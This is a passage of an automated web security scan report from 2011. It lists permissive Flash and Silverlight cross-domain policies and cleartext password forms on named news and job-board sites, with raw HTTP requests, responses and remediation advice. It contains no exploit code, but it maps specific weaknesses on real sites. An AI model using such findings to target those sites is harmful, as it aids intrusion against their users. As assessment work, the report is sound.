<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*" /><allow-http-request-headers
...[SNIP]...

4.2. http://www.msnbc.msn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 23:28:06 GMT
ETag: "fa4f1f651d9bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 3654
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...

4.3. http://www.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 22 Jan 2011 01:23:31 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=2d1ea85e6af94d3a31937c53; expires=Sunday, 22-Jan-2012 01:23:31 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

4.4. http://www.politico.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.politico.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 08 Mar 2010 23:08:26 GMT
ETag: "ffc7c-2cc-24782e80"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Fri, 21 Jan 2011 23:39:59 GMT
Date: Fri, 21 Jan 2011 23:39:49 GMT
Content-Length: 716
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.politico.com" />
   <allow-access-from domain="*brightcove" />
   <allow-access-from domain="*.brightcove" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.politiconetwork.com" />
   <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cache.btrll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="admin.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.google-analytics.com"/>
   <allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.5. http://www.usatoday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 1507
Content-Type: text/xml
Last-Modified: Mon, 02 Aug 2010 19:50:58 GMT
Accept-Ranges: bytes
ETag: "72574c77c32cb1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://www.usatoday.com/clientaccesspolicy.xml
http://www.msnbc.msn.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://www.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 730
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:44 GMT
Accept-Ranges: bytes
ETag: "3115b4c8f2baca1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

5.2. http://www.msnbc.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.msn.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
ETag: "55f13f705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Date: Fri, 21 Jan 2011 23:39:25 GMT
Content-Length: 533
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...

6. Cleartext submission of password previous next
There are 125 instances of this issue:

http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentcrossing.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.ericmmartin.com/projects/simplemodal/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.journalismcrossing.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
http://www.lawcrossing.com/lcjssearchresults.php
http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
http://www.lawschoolloans.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.toyota.com/owners/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.woothemes.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://www.100kcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.100kcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.100kcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.2. http://www.accountingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accountingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.accountingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.3. http://www.accountmanagementcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accountmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.accountmanagementcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.4. http://www.actuarialcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.actuarialcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.actuarialcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.actuarialcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.5. http://www.admincrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.admincrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.admincrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
